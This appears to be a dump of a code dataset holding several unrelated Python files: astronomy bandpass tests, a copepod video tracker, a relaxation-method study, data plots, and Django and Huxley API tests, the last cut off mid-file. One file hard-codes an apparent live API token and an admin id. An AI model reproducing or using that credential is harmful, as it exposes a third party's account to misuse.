index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
24,100 | 977e77cab03316df958d9057d2f92270979ec773 | from __future__ import division
import sys
import os
import unittest
import testutil
import pysynphot as S
import numpy as N
class AnalyticBP(testutil.FPTestCase):
    """Sanity checks for analytic bandpasses (Box, UniformTransmission)."""

    def setUp(self):
        # A 100-Angstrom-wide box bandpass centered at 10000 Angstroms.
        self.bp = S.Box(10000, 100)

    def testbp1(self):
        # Throughput at the box center is unity.
        value = self.bp(10000)
        self.assertTrue(value == 1.0)

    def testconstant(self):
        # Multiplying a bandpass by a scalar scales its throughput.
        scaled = self.bp * 3
        value = scaled(10000)
        self.assertTrue(value == 3)

    def testbp2(self):
        # Throughput far outside the box is zero.
        value = self.bp(3000)
        self.assertTrue(value == 0.0)

    def testbp3(self):
        # sample() agrees with __call__ inside the box.
        value = self.bp.sample(10000)
        self.assertTrue(value == 1.0)

    def testbp4(self):
        # sample() agrees with __call__ outside the box.
        value = self.bp.sample(3000)
        self.assertTrue(value == 0.0)

    def testflat(self):
        # A uniform transmission returns its constant everywhere.
        self.bp = S.UniformTransmission(0.5)
        value = self.bp.sample(3000)
        self.assertTrue(value == 0.5)
class Tabular(testutil.FPTestCase):
    """Checks for spectra and bandpasses built from tabular (array) data."""

    def setUp(self):
        # Wavelength grid 1000-1999 with a flat top of 10 in the middle
        # and zeros in the 100-point margins at both ends.
        self.wv = N.arange(1000, 2000)
        self.fl = N.zeros(self.wv.shape)
        self.fl[100:-100] = 10.0

    def testsp(self):
        # Sampling an ArraySpectrum inside the flat top returns the flux value.
        self.sp = S.ArraySpectrum(self.wv, self.fl,
                                  fluxunits='photlam')
        sampled = self.sp(1500)
        self.assertTrue(sampled == 10)

    def testcompsp(self):
        # A composite (summed) spectrum samples to the sum of its parts.
        first = S.ArraySpectrum(self.wv, self.fl, fluxunits='photlam')
        second = S.ArraySpectrum(self.wv[48:], self.fl[48:]*2.3,
                                 fluxunits='photlam')
        self.sp = first + second
        sampled = self.sp(1500)
        self.assertTrue(sampled == 10+(10*2.3))

    def testbp(self):
        # The same sampling behavior holds for an ArrayBandpass.
        self.bp = S.ArrayBandpass(self.wv, self.fl)
        sampled = self.bp(1500)
        self.assertTrue(sampled == 10)
class TestDoesntError(unittest.TestCase):
    """Smoke tests: constructing and sampling these objects must not raise.

    The returned values are deliberately not checked for correctness.
    """

    def testobsband(self):
        self.bp = S.ObsBandpass('acs,hrc,f555w')
        self.bp(3000)
        assert True

    def testicat(self):
        self.sp = S.Icat('k93models', 4500, 1, 2)
        self.sp(3000)
        assert True
|
24,101 | ef6506bebf6a7f968022381c98fed9ec22f83cb2 | #!/usr/bin/python
def outlierCleaner(predictions, ages, net_worths):
    """
    Clean away the 10% of points that have the largest residual errors
    (difference between the prediction and the actual net worth).

    Args:
        predictions: numpy array of shape (n, 1) of predicted net worths.
        ages: numpy array of shape (n, 1) of the age feature.
        net_worths: numpy array of shape (n, 1) of actual net worths.

    Returns:
        A list of tuples (age, net_worth, error), sorted ascending by
        error, keeping the 90% of points with the smallest residuals.
    """
    errors = abs(predictions - net_worths)
    cleaned_data = [
        (ages[k][0], net_worths[k][0], errors[k][0])
        for k in range(len(ages))
    ]
    cleaned_data.sort(key=lambda data: data[2])
    # Drop the worst 10% of points. The original hard-coded the removal of
    # 9 points, which is only correct for a 90-point dataset.
    keep = len(cleaned_data) - len(cleaned_data) // 10
    return cleaned_data[:keep]
|
24,102 | 665b27722263738122d67ca56a46317fe5d6d798 | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 15 14:17:07 2018
@author: phosp
"""
import numpy as np
import pandas as pd
import random
import cv2
from pathlib import Path
from tracking_cop_movement import get_random_images, find_wells
# get video info (per-video metadata table)
video_tbl = pd.read_csv("video_tbl/video_table_drop.csv")
# get wells to track for each plate (loaded but not used in this script)
wells_to_track = pd.read_csv("wells_to_track.csv")
# get list of all mov files
cwd = Path.cwd()
# Hard-coded path to a single video (plate 1, day 5) relative to the parent dir.
vid_path = cwd.parent/"GxG_videos/day5/pl1_day5.mov"
vid = str(vid_path)
fname = Path(vid_path).name  # file name
r_vid_tbl = video_tbl[video_tbl.file_name == fname]  # match file name in vid table
# Pull per-video metadata from the first matching row
# (assumes exactly one row matches — TODO confirm).
plate = r_vid_tbl.iloc[0]['plate']
day = r_vid_tbl.iloc[0]['day']
tot_frames = r_vid_tbl.iloc[0]['frames']
vid_width = r_vid_tbl.iloc[0]['width']
vid_height = r_vid_tbl.iloc[0]['height']
drop = int(r_vid_tbl.iloc[0]['drop'])  # frame index of the 'drop' event
tracked = r_vid_tbl.iloc[0]['tracked']
# Sample 50 random frames before and after the drop, then locate the wells
# in the 'before' frames.
rand_imgs_before, rand_imgs_after = get_random_images(vid, tot_frames, drop, 50)
wells_before = find_wells(rand_imgs_before)
def find_copepod(binary_frame):
    '''
    Take in a binary image and return the identified blobs.

    Detector parameters are set to find a moving copepod, i.e. when it is
    in the foreground, not the background. Helper for the track_copepod
    functions.

    Args:
        binary_frame: binary (thresholded) image accepted by OpenCV.

    Returns:
        Tuple (cop_found, x, y, cop_qual, blobs): whether a copepod was
        found, the rounded x-y coordinates of the first blob (None if no
        blob), the blob size (None if no blob), and the blob count.
    '''
    # Set up blob detector parameters.
    params = cv2.SimpleBlobDetector_Params()
    # Threshold range from black to white.
    params.minThreshold = 0
    params.maxThreshold = 255
    # Only blobs bigger than 10 pixels in area; does not avoid all noise.
    params.filterByArea = True
    params.minArea = 10
    # Create a detector; the constructor name changed in OpenCV 3.
    major_version = int(cv2.__version__.split('.')[0])
    if major_version < 3:
        detector = cv2.SimpleBlobDetector(params)
    else:
        detector = cv2.SimpleBlobDetector_create(params)
    # Run the detector on the frame.
    keypoints = detector.detect(binary_frame)
    blobs = len(keypoints)
    cop_found = blobs > 0
    # If a copepod was found, extract position and size from the first blob.
    if cop_found:
        (x, y), cop_qual = keypoints[0].pt, keypoints[0].size
        x, y = round(x, 2), round(y, 2)
    else:
        x, y, cop_qual = None, None, None
    return (cop_found, x, y, cop_qual, blobs)
def track_copepod_before(well, video, wells_vec, drop, vid_width, vid_height):
    """Track the copepod in one well for all frames before the 'drop' event.

    Args:
        well: key/index of the well to track in wells_vec.
        wells_vec: per-well circles; wells_vec[well] unpacks to (xc, yc, radius).
        video: path to the video file (string).
        drop: frame index at which tracking stops.
        vid_width, vid_height: frame dimensions in pixels.

    Returns:
        pandas DataFrame with one row per tracked frame:
        columns 'frame', 'x', 'y', 'blobs', 'blob_size'.

    Side effects: writes an annotated clip to 'vids/demo.mp4' and shows a
    live preview window (press 'q' to abort).
    """
    # create masks to isolate the well: True for pixels outside the circle
    x, y = np.meshgrid(np.arange(vid_width), np.arange(vid_height))
    xc, yc, rad = wells_vec[well]
    d2 = (x - xc)**2 + (y - yc)**2
    mask_before = d2 > rad**2
    # open video
    cap = cv2.VideoCapture(video)
    # Define the codec and create VideoWriter object
    fourcc = cv2.VideoWriter_fourcc(*'XVID')
    out = cv2.VideoWriter('vids/demo.mp4',fourcc, 32, (vid_width, vid_height))
    # model for background subtraction
    fgbg = cv2.createBackgroundSubtractorMOG2(history = 500,detectShadows = False)
    # First pass: run through the video once to 'train' the background model.
    cap.set(cv2.CAP_PROP_POS_FRAMES, 0)
    while(cap.isOpened()):
        frame_n = cap.get(cv2.CAP_PROP_POS_FRAMES)
        ret, frame = cap.read()
        # NOTE(review): `ret` is never checked — a failed read before `drop`
        # would make cvtColor raise; confirm `drop` < total frame count.
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        frame[mask_before] = 0  # black out everything outside the well
        frame = fgbg.apply(frame)
        if frame_n >= drop:
            break
    # Second pass: reset at initial frame and track.
    cap.set(cv2.CAP_PROP_POS_FRAMES, 0)
    ret, old_frame = cap.read()
    old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)
    old_gray[mask_before] = 0
    old_gray = fgbg.apply(old_gray)
    old_gray = cv2.bitwise_not(old_gray) # makes binary
    # output initial data row for frame 0
    cop_found, xp, yp, cop_qual, blobs = find_copepod(old_gray)
    out_array = np.array([[0, xp, yp, blobs, cop_qual]])
    while(cap.isOpened()):
        frame_n = cap.get(cv2.CAP_PROP_POS_FRAMES)
        ret, frame = cap.read()
        if frame_n < 150:
            # First 150 frames: only record/preview, no tracking.
            out.write(frame)
            cv2.imshow('frame', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
        elif frame_n < drop:
            # convert frame to grayscale, mask, and background-subtract
            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
            gray[mask_before] = 0
            frame[mask_before] = 0
            gray = fgbg.apply(gray)
            gray = cv2.bitwise_not(gray)
            # find a copepod
            # NOTE(review): xc, yc are reused here, shadowing the well-center
            # coordinates unpacked above (harmless — the mask is precomputed).
            cop_found, xc, yc, cop_qual, blobs = find_copepod(gray)
            if cop_found:
                # make a row of data
                out_row = np.array([frame_n, xc, yc, blobs, cop_qual])
                # draw a red circle around the copepod
                cv2.circle(frame,(int(xc),int(yc)),4,(0,0,255), 2)
                # remember the coordinates for frames where it is not moving
                xp, yp = xc, yc
            else:
                # if cop not found, use the x-y coordinates from the previous frame
                out_row = np.array([frame_n, xp, yp, blobs, cop_qual])
                if xp is not None:
                    cv2.circle(frame,(int(xp),int(yp)),4,(255,0,0), 2)
            # append the row to the output array, frame-by-frame
            out_array = np.append(out_array, [out_row], axis = 0)
            out.write(frame)
            cv2.imshow('frame', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
        else:
            break
    # close video handles and return the collected data as a DataFrame
    cap.release()
    out.release()
    cv2.destroyAllWindows()
    return(pd.DataFrame(out_array, columns = ['frame', 'x', 'y', 'blobs', 'blob_size']))
# Run tracking for well 13 on the pre-drop portion of the loaded video.
track_copepod_before(13,vid,wells_before,drop,vid_width,vid_height)
|
24,103 | e637f99380224f0f5e4449d3b980a052d7dc987c | #API Token
# SECURITY NOTE(review): hard-coded credentials committed to source control;
# these should be loaded from an environment variable or a secrets store,
# and the exposed token should be rotated.
# Bot API token.
API_TOKEN = 'e6712695b71871ce41b32cfe99ffce6505ca650a'
# Numeric id of the bot administrator account.
admin_id = 444795295
|
24,104 | 300ba3d45e38bfbd238b1bdcf833b5ad28db12a7 | from django import forms
from .models import ParkingLot
class ParkingLotForm(forms.ModelForm):
    """ModelForm for creating and editing ParkingLot records."""

    class Meta:
        model = ParkingLot
        # 'address' was listed twice in the original tuple; the duplicate
        # entry is redundant and has been removed.
        fields = (
            'address',
            'owner',
            'time',
            'tel',
            'price',
            'photo',
        )
|
24,105 | 5ef06b6c5ea2c27a0b84c2f62f50ef5094b108c6 | ii = [('AubePRP2.py', 1), ('PeckJNG.py', 1), ('CarlTFR.py', 1), ('GilmCRS.py', 1), ('HowiWRL2.py', 1), ('MartHSI.py', 1), ('EvarJSP.py', 1)] |
24,106 | 5c6369a40bf909804fca2f6f35b98df272ff624e | from tkinter import *
from tkinter import ttk
from app import *
import boot
import database
# Placeholder path constants; empty here and not referenced in this module
# (presumably configured or overridden elsewhere — TODO confirm).
DATABASE_PATH = ''
BACKUP_PATH = ''
def main():
    """Boot the database, run the GUI application, then persist to CSV."""
    # boot
    store = boot.boot()
    # Run the app until its main loop exits.
    gui = App(store)
    gui.mainloop()
    # Flush the database contents to CSV after the window closes.
    store.csv_update()


if __name__ == "__main__":
    main()
24,107 | 894a4930c48fdff443ba98f0303c7b5a354d4556 | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
from scipy.optimize import curve_fit
from pylab import cm as plcm # colors for plotting
import pickle # for storing calculations and reading again while editing plot details
plt.rcParams.update({'font.size': 14})
# ------------------------- Set global values
nToExamine = [5,10] # grid sizes singled out by the assignment
nArray = [n for n in range(2,30)] # range to find dependence on n
tolerance = 0.01 # max relative error from the exact solution
# Reference data for the plots below: relaxation steps needed to reach the
# tolerance for each n in nArray, obtained with two other methods.
stepsToToleranceArray1 = [1, 3, 5, 8, 10, 14, 18, 23, 29,
                          35, 41, 48, 56, 64, 73, 82, 92,
                          103, 113, 125, 137, 150, 163,
                          177, 191, 206, 222, 238]
stepsToToleranceArray2 = [1, 4, 8, 13, 20, 26, 35, 44,
                          56, 67, 81, 94, 110, 126, 144,
                          162, 182, 203, 225, 248, 272,
                          297, 324, 352, 381, 410, 442, 473]
# ------------------------- Define functions
def initiateVMatrixes():
    """Initiate the potential matrices for the module-global grid size n.

    - v has the boundary values set and an initial guess of 9 in the interior
    - vNew is a copy of v
    - vExact is the exact analytical solution: 10 at every non-corner point
    """
    global v, vNew, vExact
    # Start from an all-zero (n+1)x(n+1) grid; index i is the row, j the column.
    v = np.zeros((n+1, n+1))
    # Boundary conditions: the four edges (excluding corners) are held at 10.
    v[0, 1:n] = 10
    v[n, 1:n] = 10
    v[1:n, 0] = 10
    v[1:n, n] = 10
    # Exact solution: same boundary, and 10 at every interior point.
    vExact = np.copy(v)
    vExact[1:n, 1:n] = 10
    # Initial guess: 90% of the exact interior value (i.e. 9 everywhere inside).
    v[1:n, 1:n] = 0.9 * vExact[1:n, 1:n]
    vNew = np.copy(v)
def relax_checker():
    """One checkerboard relaxation sweep over the module-global grid v.

    Each interior point v[x, y] is replaced in place by the average of its
    four neighbours. The grid is swept twice, once per checkerboard parity,
    so every interior point is updated exactly once per call.
    """
    global v, vNew, n
    # (The original declared an unused local `checker = 2`; removed.)
    for parity in range(0, 2):
        for x in range(1, n):
            for y in range(1, n):
                # Parity of the flattened index x*(n+1) + y selects the
                # checkerboard colour of the point.
                if (x*(n+1) + y) % 2 == parity:
                    v[x, y] = (v[x-1][y] + v[x+1][y] + v[x][y-1] + v[x][y+1])*0.25
def calculate():
    """Main calculation: for each grid size n in nArray, initialise the
    grids with initiateVMatrixes() and apply relax_checker() sweeps until
    every interior point of v is within `tolerance` of the exact solution.

    Side effects: rebinds the module globals n, v, vNew, vExact and fills
    stepsToToleranceArray with the sweep count for each n; prints progress,
    with an extra line for n = 5 and n = 10.
    """
    global v, vNew, n, stepsToToleranceArray
    stepsToToleranceArray = []
    for n in nArray:
        print('Currently working with n = ', n)
        initiateVMatrixes()
        step = 0
        toleranceAcqurired = False
        while not toleranceAcqurired:
            step+=1
            relax_checker()
            # Control accuracy: run through v and set False if any interior
            # point is still outside the tolerance.
            toleranceAcqurired = True
            for i in range(1,n):
                for j in range(1,n):
                    if np.abs( (v[i,j]-vExact[i,j])/vExact[i,j] ) > tolerance:
                        toleranceAcqurired = False
            if toleranceAcqurired:
                stepsToToleranceArray.append(step)
            if n in [5,10]: print('n =', n, 'steps =', step)
# ----------------------- Main
calculate() # comment out to only load data
# ----------------------- Plot
# common plot values
commonLinewidth = 2

# Linear plot: this run's checker relaxation against the two reference methods.
plt.figure() # linear plot
plt.plot(nArray, stepsToToleranceArray,
         linewidth = commonLinewidth,
         linestyle = '--',
         marker = '.',
         markersize = 8,
         color = 'tab:cyan',
         zorder = 2)
plt.plot(nArray, stepsToToleranceArray1,
         linewidth = commonLinewidth,
         linestyle = '-',
         marker = 'x',
         markersize = 8,
         color = 'tab:blue',
         zorder = 1)
plt.plot(nArray, stepsToToleranceArray2,
         linewidth = commonLinewidth,
         marker = '.',
         markersize = 8,
         color = 'b',
         zorder = 0)
plt.title(r'Steps required to reach tolerance', fontsize = 18)
plt.legend(['Checker relaxation', 'Gauss-Seidel', 'Relaxation method'])
plt.ylabel('Relaxations', fontsize = 18)
plt.xlabel('Grid size (n)', fontsize = 18 )
plt.show()

plt.figure() # loglog plot
# Fit a straight line in log-log space, from index 10 of nArray (n = 12)
# onward, to estimate the power-law exponent steps ~ n^k.
log_nArray = [np.log(n) for n in nArray]
log_stepsToToleranceArray = [np.log(steps) for steps in stepsToToleranceArray]
def f(x,k,m):
    # Straight line in log-log space: log(steps) = k*log(n) + m.
    return k*x+m
[k,m], _ = curve_fit(f, log_nArray[10:], log_stepsToToleranceArray[10:])
# plot loglog with regression
plt.loglog(nArray, [np.e**f(x,k,m) for x in log_nArray],
           linewidth = commonLinewidth,
           linestyle = '--',
           zorder = 3,
           color = 'r')
plt.loglog(nArray, stepsToToleranceArray,
           linewidth = commonLinewidth,
           color = 'tab:red',
           marker = '.',
           markersize = 8)
plt.legend(['Computarional data', r'log(f(n))$ = %s \, \log(n) - %s$'%(round(k,3), round(np.abs(m),3))],
           fancybox = True)
plt.title('Relaxations for tolerance (log-log)', fontsize = 18)
plt.ylabel('Relaxations', fontsize = 18)
plt.xlabel('Grid size (n)', fontsize = 18)
plt.show()
|
24,108 | 85ce90891d5455a3e9f5627c57865ce63ddda17b | from flask import request
from routes.main import MainRoute
class TimerRoute(MainRoute):
    """Route that reads and writes a timer value persisted in 'time.txt'."""

    def __init__(self):
        super().__init__()

    def _generate_response(self, input_data=None):
        # Delegate response formatting to the base route.
        return super()._generate_response(input_data)

    def get(self):
        """Return the first line of time.txt as the response payload."""
        # Use a context manager so the file handle is closed even if an
        # error occurs (the original open()/close() pair could leak it).
        with open('time.txt', 'r') as timer_file:
            my_time = timer_file.readline()
        return self._generate_response(my_time)

    def post(self):
        """Persist the posted 'time' form field to time.txt and echo it back."""
        act = request.form['time']
        with open('time.txt', 'w') as timer_file:
            timer_file.write(act)
        return self._generate_response(act)

    def get_route(self):
        # URL path under which this route is mounted.
        return '/timer'
24,109 | 58910f5fa2d7dd7d44dc79519769cfbb70a5c569 | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 6 22:58:05 2020
@author: prisc
"""
#1 IMPORT AND PREPARE THE DATA
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import time
# Load the dataset; 'diagnosis' is the target label.
data = pd.read_csv('data.csv')
#print (data.head())
#print (data.columns)
y = data.diagnosis #storing diagnosis data
# Drop the label, the id, and the empty trailing column to get the features.
cols_to_drop = ['Unnamed: 32', 'id', 'diagnosis']
x = data.drop(cols_to_drop, axis = 1)
print (y.head())
print (x.head())
#2 PLOT THE DATA
ax = sns.countplot(y, label="Count")
# NOTE(review): assumes value_counts() yields the benign count first —
# confirm the class ordering in the data.
B, M = y.value_counts()
print ('Benign Tumors: ', B)
print ('Malignant Tumors: ', M)
print (x.describe())
#3 STANDARDIZING THE DATA AND VISUALIZE TO SELECT THE FEATURES
data = x
standardized_data = (data - data.mean()) / data.std() #to standardize the data
# Melt the first 10 standardized features into long form for seaborn.
data = pd.concat([y, standardized_data.iloc[:, 0:10]], axis = 1)
data = pd.melt(data, id_vars='diagnosis',
               var_name='features',
               value_name='value')
plt.figure(figsize = (10, 10))
sns.violinplot(x = 'features',
               y = 'value',
               hue = 'diagnosis',
               data = data,
               split = True,
               inner = 'quart') #good for visualizing distributions
plt.xticks(rotation = 90)
plt.show()
# Box plot of the same long-form data.
sns.boxplot(x = 'features',
            y = 'value',
            hue = 'diagnosis',
            data = data)
plt.xticks(rotation = '90')
plt.show()
#sns.jointplot(x.loc[:, 'concavity_mean'],
#              x.loc[:, 'concave points_mean'],
#              kind = 'regg',) #to compare two features if they're correlated
sns.set(style = 'whitegrid', palette = 'muted')
# Swarm plot shows every individual observation.
sns.swarmplot(x = 'features',
              y = 'value',
              hue = 'diagnosis',
              data = data)
plt.xticks(rotation = 90)
plt.show()
# Correlation heatmap across all features.
f, ax = plt.subplots(figsize = (15, 15))
sns.heatmap(x.corr(),
            annot = True,
            linewidth = .5,
            fmt = '.1f',
            ax = ax)
|
24,110 | 1f63250de935902c25a33b85a831d9a0a26dffd3 | # Copyright (c) 2011-2022 Berkeley Model United Nations. All rights reserved.
# Use of this source code is governed by a BSD License (see LICENSE).
from collections import OrderedDict
from huxley.accounts.models import User
from huxley.api import tests
from huxley.api.tests import auto
from huxley.utils.test import models
class AssignmentDetailGetTestCase(auto.RetrieveAPIAutoTestCase):
    """Permission checks for GET on the assignment detail endpoint."""
    url_name = 'api:assignment_detail'

    @classmethod
    def get_test_object(cls):
        return models.new_assignment()

    def test_anonymous_user(self):
        # Unauthenticated requests are rejected.
        self.do_test(expected_error=auto.EXP_NOT_AUTHENTICATED)

    def test_advisor(self):
        # The advisor of the assignment's school may retrieve it.
        advisor = self.object.registration.school.advisor
        self.as_user(advisor).do_test()

    def test_chair(self):
        # A chair unrelated to the assignment is denied.
        chair_user = models.new_user(user_type=User.TYPE_CHAIR)
        self.as_user(chair_user).do_test(
            expected_error=auto.EXP_PERMISSION_DENIED)

    def test_delegate(self):
        # A delegate not holding this assignment is denied...
        unassigned = models.new_user(user_type=User.TYPE_DELEGATE)
        self.as_user(unassigned).do_test(
            expected_error=auto.EXP_PERMISSION_DENIED)
        # ...while a delegate who holds it may retrieve it.
        held = models.new_delegate(assignment=self.object)
        assigned_user = models.new_user(
            user_type=User.TYPE_DELEGATE, delegate=held)
        self.as_user(assigned_user).do_test()

    def test_superuser(self):
        self.as_superuser().do_test()
class AssignmentDetailPutTestCase(tests.UpdateAPITestCase):
    """Permission and payload checks for PUT on the assignment detail endpoint."""
    url_name = 'api:assignment_detail'
    params = {'rejected': True}

    def setUp(self):
        self.advisor = models.new_user(username='advisor', password='advisor')
        self.school = models.new_school(user=self.advisor)
        self.registration = models.new_registration(school=self.school)
        self.chair = models.new_user(
            username='chair', password='chair', user_type=User.TYPE_CHAIR)
        self.committee = models.new_committee(user=self.chair)
        self.assignment = models.new_assignment(
            committee=self.committee, registration=self.registration)
        self.delegate_user = models.new_user(
            username='delegate',
            password='delegate',
            user_type=User.TYPE_DELEGATE)
        self.delegate = models.new_delegate(
            user=self.delegate_user,
            school=self.school,
            assignment=self.assignment)

    def _expected_data(self):
        """Serialized representation the endpoint should return for
        self.assignment after a successful update (rejected=True).

        Factored out of test_advisor/test_superuser, which previously
        duplicated this dictionary verbatim.
        """
        paper = self.assignment.paper
        return {
            "id": self.assignment.id,
            "committee": self.assignment.committee.id,
            "country": self.assignment.country.id,
            "registration": self.registration.id,
            "paper": OrderedDict(
                [('id', paper.id),
                 ('file', paper.file),
                 ('graded_file', paper.graded_file),
                 ('graded', paper.graded),
                 ('score_1', paper.score_1),
                 ('score_2', paper.score_2),
                 ('score_3', paper.score_3),
                 ('score_4', paper.score_4),
                 ('score_5', paper.score_5),
                 ('score_t2_1', paper.score_t2_1),
                 ('score_t2_2', paper.score_t2_2),
                 ('score_t2_3', paper.score_t2_3),
                 ('score_t2_4', paper.score_t2_4),
                 ('score_t2_5', paper.score_t2_5),
                 ('submission_date', paper.submission_date)]),
            "rejected": True,
        }

    def test_anonymous_user(self):
        '''Unauthenticated users shouldn't be able to update assignments.'''
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertNotAuthenticated(response)

    def test_advisor(self):
        '''It should return correct data.'''
        self.client.login(username='advisor', password='advisor')
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertEqual(response.data, self._expected_data())

    def test_chair(self):
        '''Chairs should not be able to update assignments'''
        self.client.login(username='chair', password='chair')
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertPermissionDenied(response)

    def test_delegate(self):
        '''Delegates should not be able to update assignments'''
        self.client.login(username='delegate', password='delegate')
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertPermissionDenied(response)

    def test_superuser(self):
        '''It should return correct data.'''
        # (The original bound the created superuser to an unused local.)
        models.new_superuser(username='s_user', password='s_user')
        self.client.login(username='s_user', password='s_user')
        response = self.get_response(self.assignment.id)
        self.assertEqual(response.data, self._expected_data())
class AssignmentDetailPatchTestCase(tests.PartialUpdateAPITestCase):
    """Permission and payload checks for PATCH on the assignment detail endpoint."""
    url_name = 'api:assignment_detail'
    params = {'rejected': True}

    def setUp(self):
        self.advisor = models.new_user(username='advisor', password='advisor')
        self.school = models.new_school(user=self.advisor)
        self.registration = models.new_registration(school=self.school)
        self.chair = models.new_user(
            username='chair', password='chair', user_type=User.TYPE_CHAIR)
        self.committee = models.new_committee(user=self.chair)
        self.assignment = models.new_assignment(
            committee=self.committee, registration=self.registration)
        self.delegate_user = models.new_user(
            username='delegate',
            password='delegate',
            user_type=User.TYPE_DELEGATE)
        self.delegate = models.new_delegate(
            user=self.delegate_user,
            school=self.school,
            assignment=self.assignment)

    def _expected_data(self):
        """Serialized representation the endpoint should return for
        self.assignment after a successful partial update (rejected=True).

        Factored out of test_advisor/test_superuser, which previously
        duplicated this dictionary verbatim.
        """
        paper = self.assignment.paper
        return {
            "id": self.assignment.id,
            "committee": self.assignment.committee.id,
            "country": self.assignment.country.id,
            "registration": self.registration.id,
            "paper": OrderedDict(
                [('id', paper.id),
                 ('file', paper.file),
                 ('graded_file', paper.graded_file),
                 ('graded', paper.graded),
                 ('score_1', paper.score_1),
                 ('score_2', paper.score_2),
                 ('score_3', paper.score_3),
                 ('score_4', paper.score_4),
                 ('score_5', paper.score_5),
                 ('score_t2_1', paper.score_t2_1),
                 ('score_t2_2', paper.score_t2_2),
                 ('score_t2_3', paper.score_t2_3),
                 ('score_t2_4', paper.score_t2_4),
                 ('score_t2_5', paper.score_t2_5),
                 ('submission_date', paper.submission_date)]),
            "rejected": True,
        }

    def test_anonymous_user(self):
        '''Unauthenticated users shouldn't be able to update assignments.'''
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertNotAuthenticated(response)

    def test_advisor(self):
        '''It should return correct data.'''
        self.client.login(username='advisor', password='advisor')
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertEqual(response.data, self._expected_data())

    def test_chair(self):
        '''Chairs should not be able to update assignments'''
        self.client.login(username='chair', password='chair')
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertPermissionDenied(response)

    def test_delegate(self):
        '''Delegates should not be able to update assignments'''
        self.client.login(username='delegate', password='delegate')
        response = self.get_response(self.assignment.id, params=self.params)
        self.assertPermissionDenied(response)

    def test_superuser(self):
        '''It should return correct data.'''
        # (The original bound the created superuser to an unused local.)
        models.new_superuser(username='s_user', password='s_user')
        self.client.login(username='s_user', password='s_user')
        response = self.get_response(self.assignment.id)
        self.assertEqual(response.data, self._expected_data())
class AssignmentDetailDeleteTestCase(auto.DestroyAPIAutoTestCase):
    """DELETE on the assignment detail endpoint is forbidden for every user type."""
    url_name = 'api:assignment_detail'

    @classmethod
    def get_test_object(cls):
        return models.new_assignment()

    def test_anonymous_user(self):
        '''Anonymous users cannot delete assignments.'''
        self.do_test(expected_error=auto.EXP_NOT_AUTHENTICATED)

    def test_advisor(self):
        '''Advisors cannot delete their assignments.'''
        advisor = self.object.registration.school.advisor
        self.as_user(advisor).do_test(
            expected_error=auto.EXP_DELETE_NOT_ALLOWED)

    def test_chair(self):
        '''Chairs cannot delete their assignments.'''
        chair_user = models.new_user(user_type=User.TYPE_CHAIR)
        self.as_user(chair_user).do_test(
            expected_error=auto.EXP_PERMISSION_DENIED)

    def test_delegate(self):
        '''Delegates cannot delete their assignment.'''
        delegate = models.new_user(user_type=User.TYPE_DELEGATE)
        self.as_user(delegate).do_test(
            expected_error=auto.EXP_PERMISSION_DENIED)

    def test_other_user(self):
        '''A user cannot delete another user's assignments.'''
        models.new_school(user=self.default_user)
        self.as_default_user().do_test(
            expected_error=auto.EXP_PERMISSION_DENIED)

    def test_superuser(self):
        '''A superuser cannot delete assignments.'''
        self.as_superuser().do_test(
            expected_error=auto.EXP_DELETE_NOT_ALLOWED)
class AssignmentListCreateTestCase(tests.CreateAPITestCase):
    """Only superusers may POST new assignments to the list endpoint."""
    url_name = 'api:assignment_list'
    params = {'rejected': True}

    def setUp(self):
        self.advisor = models.new_user(username='advisor', password='advisor')
        self.chair = models.new_user(
            username='chair', password='chair', user_type=User.TYPE_CHAIR)
        self.school = models.new_school(user=self.advisor)
        self.registration = models.new_registration(school=self.school)
        self.committee = models.new_committee(user=self.chair)
        self.country = models.new_country()
        self.delegate_user = models.new_user(
            username='delegate',
            password='delegate',
            user_type=User.TYPE_DELEGATE)
        # Rebind self.params to a per-instance copy. The original mutated the
        # class-level dict in place (self.params['committee'] = ...), leaking
        # stale ids into every other instance of this test case.
        self.params = dict(
            self.params,
            committee=self.committee.id,
            registration=self.registration.id,
            country=self.country.id)

    def test_anonymous_user(self):
        '''Anonymous Users should not be able to create assignments.'''
        response = self.get_response(params=self.params)
        self.assertNotAuthenticated(response)

    def test_advisor(self):
        '''Advisors should not be able to create Assignments.'''
        self.client.login(username='advisor', password='advisor')
        response = self.get_response(params=self.params)
        self.assertPermissionDenied(response)

    def test_chair(self):
        '''Chairs should not be able to create Assignments'''
        self.client.login(username='chair', password='chair')
        response = self.get_response(params=self.params)
        self.assertPermissionDenied(response)

    def test_delegate(self):
        '''Delegates should not be able to create Assignments'''
        self.client.login(username='delegate', password='delegate')
        response = self.get_response(params=self.params)
        self.assertPermissionDenied(response)

    def test_superuser(self):
        '''Superusers should be able to create assignments.'''
        models.new_superuser(username='s_user', password='s_user')
        self.client.login(username='s_user', password='s_user')
        response = self.get_response(params=self.params)
        # id and paper are generated server-side; only check the fields we set.
        response.data.pop('id')
        response.data.pop('paper')
        self.assertEqual(response.data, {
            "committee": self.committee.id,
            "country": self.country.id,
            "registration": self.registration.id,
            "rejected": True,
        })
class AssignmentListGetTestCase(tests.ListAPITestCase):
    """Filtering and permission checks for GET on the assignment list endpoint."""
    url_name = 'api:assignment_list'

    def setUp(self):
        self.advisor = models.new_user(username='advisor', password='advisor')
        self.chair = models.new_user(
            username='chair', password='chair', user_type=User.TYPE_CHAIR)
        self.delegate_user = models.new_user(
            username='delegate',
            password='delegate',
            user_type=User.TYPE_DELEGATE)
        self.school = models.new_school(user=self.advisor)
        self.registration = models.new_registration(school=self.school)
        self.committee = models.new_committee(user=self.chair)
        # a1/a2 belong to this school's registration and committee; a3 does not.
        self.a1 = models.new_assignment(
            registration=self.registration, committee=self.committee)
